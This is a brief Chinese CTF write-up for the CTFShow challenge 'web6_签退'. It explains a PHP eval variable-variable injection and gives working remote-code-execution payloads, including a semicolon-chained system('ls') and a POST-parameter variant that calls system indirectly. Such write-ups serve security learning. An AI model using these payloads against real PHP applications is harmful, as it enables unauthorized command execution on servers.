CTFWP

web6_签退(CTFShow)

2020-03-31 15:43:43

考点：双$变量覆盖，RCE

<?php ($S = $_GET['S'])?eval("$$S"):highlight_file(__FILE__);

第一种解法：S=aa;system(“ls”);

linux环境下可以用;隔离执行,Windows不可以

本地搭建复现，可以看到原理

<?php $b = eval("$a;system('ls');"); highlight_file(__FILE__);

非预期玩法：

?S=_POST[1](“ls”); POST传入1=system

当有过滤的时候也可以 S=_POST[1]($_POST[2]); POST传： 1=system&2=ls

评论 (0)

点击这里取消回复。

欢迎您游客